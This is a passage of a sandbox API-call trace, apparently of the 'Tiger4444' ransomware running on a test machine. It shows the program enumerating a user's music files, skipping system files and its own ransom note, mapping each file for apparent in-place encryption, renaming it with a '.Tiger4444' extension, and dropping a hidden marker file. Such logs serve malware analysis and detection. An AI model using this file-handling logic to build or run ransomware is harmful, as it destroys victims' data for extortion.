returned 1 [0046.026] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0046.026] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0046.026] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.027] CloseHandle (hObject=0x2c8) returned 1 [0046.027] CloseHandle (hObject=0x260) returned 1 [0046.028] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\cJ70uWo2V.m4a.Tiger4444") returned 68 [0046.029] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\cJ70uWo2V.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\cj70uwo2v.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\cJ70uWo2V.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\cj70uwo2v.m4a.tiger4444"), dwFlags=0x1) returned 1 [0046.029] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=51488 | out: Addend=0xc6f980) returned 19666512 [0046.029] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4584 [0046.029] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a8b3b0, ftCreationTime.dwHighDateTime=0x1d4d4b0, ftLastAccessTime.dwLowDateTime=0x3d4fbf10, ftLastAccessTime.dwHighDateTime=0x1d4d35e, ftLastWriteTime.dwLowDateTime=0x3d4fbf10, ftLastWriteTime.dwHighDateTime=0x1d4d35e, nFileSizeHigh=0x0, nFileSizeLow=0x40bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gNF41DnE96kMsiC.mp3", cAlternateFileName="GNF41D~1.MP3")) returned 1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="Tiger4444.exe") returned -1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2=".") returned 1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="..") returned 1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="windows") returned -1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="bootmgr") returned 1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="pagefile.sys") returned -1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="boot") returned 1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="ids.txt") returned -1 [0046.029] lstrcmpiW (lpString1="gNF41DnE96kMsiC.mp3", lpString2="NTUSER.DAT") returned -1 [0046.029] lstrcpyW (in: lpString1=0x30aeb02, lpString2="gNF41DnE96kMsiC.mp3" | out: lpString1="gNF41DnE96kMsiC.mp3") returned="gNF41DnE96kMsiC.mp3" [0046.029] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\gNF41DnE96kMsiC.mp3", dwFileAttributes=0x0) returned 1 [0046.030] lstrlenW (lpString="gNF41DnE96kMsiC.mp3") returned 19 [0046.030] lstrlenW (lpString="Tiger4444") returned 9 [0046.030] lstrcmpiW (lpString1="kMsiC.mp3", lpString2="Tiger4444") returned -1 [0046.030] lstrlenW (lpString=".dll") returned 4 [0046.030] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0046.030] lstrlenW (lpString=".lnk") returned 4 [0046.030] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0046.030] lstrlenW (lpString=".ini") returned 4 [0046.030] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0046.030] lstrlenW (lpString=".sys") returned 4 [0046.030] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0046.030] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\gNF41DnE96kMsiC.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\gnf41dne96kmsic.mp3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.030] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.030] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13748319140) returned 1 [0046.030] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=16571) returned 1 [0046.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0046.030] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0046.030] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x43c0, lpName=0x0) returned 0x2c8 [0046.030] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43c0) returned 0xbe0000 [0046.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0046.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0046.031] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0046.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0046.031] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13748446187) returned 1 [0046.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0046.031] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0046.032] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.032] CloseHandle (hObject=0x2c8) returned 1 [0046.032] CloseHandle (hObject=0x260) returned 1 [0046.033] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\gNF41DnE96kMsiC.mp3.Tiger4444") returned 74 [0046.033] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\gNF41DnE96kMsiC.mp3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\gnf41dne96kmsic.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\gNF41DnE96kMsiC.mp3.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\gnf41dne96kmsic.mp3.tiger4444"), dwFlags=0x1) returned 1 [0046.034] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=16576 | out: Addend=0xc6f980) returned 19718000 [0046.034] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4585 [0046.034] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f29360, ftCreationTime.dwHighDateTime=0x1d4d47e, ftLastAccessTime.dwLowDateTime=0xe0df3510, ftLastAccessTime.dwHighDateTime=0x1d4d5ad, ftLastWriteTime.dwLowDateTime=0xe0df3510, ftLastWriteTime.dwHighDateTime=0x1d4d5ad, nFileSizeHigh=0x0, nFileSizeLow=0x9418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z2GhDV1FaIXkNy.m4a", cAlternateFileName="Z2GHDV~1.M4A")) returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="Tiger4444.exe") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2=".") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="..") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="windows") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="bootmgr") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="pagefile.sys") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="boot") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="ids.txt") returned 1 [0046.034] lstrcmpiW (lpString1="Z2GhDV1FaIXkNy.m4a", lpString2="NTUSER.DAT") returned 1 [0046.034] lstrcpyW (in: lpString1=0x30aeb02, lpString2="Z2GhDV1FaIXkNy.m4a" | out: lpString1="Z2GhDV1FaIXkNy.m4a") returned="Z2GhDV1FaIXkNy.m4a" [0046.034] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\Z2GhDV1FaIXkNy.m4a", dwFileAttributes=0x0) returned 1 [0046.034] lstrlenW (lpString="Z2GhDV1FaIXkNy.m4a") returned 18 [0046.034] lstrlenW (lpString="Tiger4444") returned 9 [0046.034] lstrcmpiW (lpString1="IXkNy.m4a", lpString2="Tiger4444") returned -1 [0046.034] lstrlenW (lpString=".dll") returned 4 [0046.034] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0046.034] lstrlenW (lpString=".lnk") returned 4 [0046.034] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0046.034] lstrlenW (lpString=".ini") returned 4 [0046.035] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0046.035] lstrlenW (lpString=".sys") returned 4 [0046.035] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0046.035] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\Z2GhDV1FaIXkNy.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\z2ghdv1faixkny.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.035] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.035] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13748784945) returned 1 [0046.035] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=37912) returned 1 [0046.035] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0046.035] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0046.035] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9720, lpName=0x0) returned 0x2c8 [0046.035] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9720) returned 0xbe0000 [0046.036] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.036] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0046.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.036] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0046.036] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0046.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0046.036] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13748944585) returned 1 [0046.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0046.036] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0046.036] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.037] CloseHandle (hObject=0x2c8) returned 1 [0046.037] CloseHandle (hObject=0x260) returned 1 [0046.038] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\Z2GhDV1FaIXkNy.m4a.Tiger4444") returned 73 [0046.038] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\Z2GhDV1FaIXkNy.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\z2ghdv1faixkny.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\Z2GhDV1FaIXkNy.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\z2ghdv1faixkny.m4a.tiger4444"), dwFlags=0x1) returned 1 [0046.039] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=37920 | out: Addend=0xc6f980) returned 19734576 [0046.039] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4586 [0046.039] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8f29360, ftCreationTime.dwHighDateTime=0x1d4d47e, ftLastAccessTime.dwLowDateTime=0xe0df3510, ftLastAccessTime.dwHighDateTime=0x1d4d5ad, ftLastWriteTime.dwLowDateTime=0xe0df3510, ftLastWriteTime.dwHighDateTime=0x1d4d5ad, nFileSizeHigh=0x0, nFileSizeLow=0x9418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z2GhDV1FaIXkNy.m4a", cAlternateFileName="Z2GHDV~1.M4A")) returned 0 [0046.039] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0046.039] lstrcpyW (in: lpString1=0x30aeb02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.039] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\Wfhv\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\wfhv\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.039] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.040] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.041] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.041] CloseHandle (hObject=0x260) returned 1 [0046.041] CloseHandle (hObject=0x2ac) returned 1 [0046.041] GetCurrentThreadId () returned 0xfa8 [0046.041] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0046.041] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ" [0046.041] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0046.041] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0046.041] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ" [0046.042] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\" [0046.042] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\.BFC0E91B00AE8A0620D3" [0046.042] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0046.045] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0046.049] FlushFileBuffers (hFile=0x2ac) returned 1 [0046.050] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0046.051] CloseHandle (hObject=0x2ac) returned 1 [0046.051] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ") returned 45 [0046.051] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.051] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x127ab8c0, ftCreationTime.dwHighDateTime=0x1d4c892, ftLastAccessTime.dwLowDateTime=0x822a96e0, ftLastAccessTime.dwHighDateTime=0x1d4cf8b, ftLastWriteTime.dwLowDateTime=0x80777aa0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73088 [0046.051] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.051] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.051] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0046.051] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0046.051] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x127ab8c0, ftCreationTime.dwHighDateTime=0x1d4c892, ftLastAccessTime.dwLowDateTime=0x822a96e0, ftLastAccessTime.dwHighDateTime=0x1d4cf8b, ftLastWriteTime.dwLowDateTime=0x80777aa0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.052] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.052] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0046.052] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0046.052] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0046.052] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0046.052] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x807518a6, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x807518a6, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x80777aa0, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0046.052] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.052] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0046.052] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4afffe0, ftCreationTime.dwHighDateTime=0x1d4c98a, ftLastAccessTime.dwLowDateTime=0xd7224de0, ftLastAccessTime.dwHighDateTime=0x1d4d324, ftLastWriteTime.dwLowDateTime=0xd7224de0, ftLastWriteTime.dwHighDateTime=0x1d4d324, nFileSizeHigh=0x0, nFileSizeLow=0xdd8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9oZvTZiqj1T2ND.wav", cAlternateFileName="9OZVTZ~1.WAV")) returned 1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="Tiger4444.exe") returned -1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2=".") returned 1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="..") returned 1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="windows") returned -1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="bootmgr") returned -1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="pagefile.sys") returned -1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="boot") returned -1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="ids.txt") returned -1 [0046.052] lstrcmpiW (lpString1="9oZvTZiqj1T2ND.wav", lpString2="NTUSER.DAT") returned -1 [0046.052] lstrcpyW (in: lpString1=0x30aeb04, lpString2="9oZvTZiqj1T2ND.wav" | out: lpString1="9oZvTZiqj1T2ND.wav") returned="9oZvTZiqj1T2ND.wav" [0046.052] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\9oZvTZiqj1T2ND.wav", dwFileAttributes=0x0) returned 1 [0046.052] lstrlenW (lpString="9oZvTZiqj1T2ND.wav") returned 18 [0046.052] lstrlenW (lpString="Tiger4444") returned 9 [0046.052] lstrcmpiW (lpString1="1T2ND.wav", lpString2="Tiger4444") returned -1 [0046.052] lstrlenW (lpString=".dll") returned 4 [0046.053] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0046.053] lstrlenW (lpString=".lnk") returned 4 [0046.053] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0046.053] lstrlenW (lpString=".ini") returned 4 [0046.053] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0046.053] lstrlenW (lpString=".sys") returned 4 [0046.053] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0046.053] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\NV_iQ\\9oZvTZiqj1T2ND.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nv_iq\\9ozvtziqj1t2nd.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.053] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.053] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13750596350) returned 1 [0046.053] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=56714) returned 1 [0046.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0046.053] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0046.053] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe090, lpName=0x0) returned 0x2c8 [0046.053] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe090) returned 0xbe0000 [0046.055] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.055] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0046.055] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.055] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0046.055] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.055] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0046.055] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 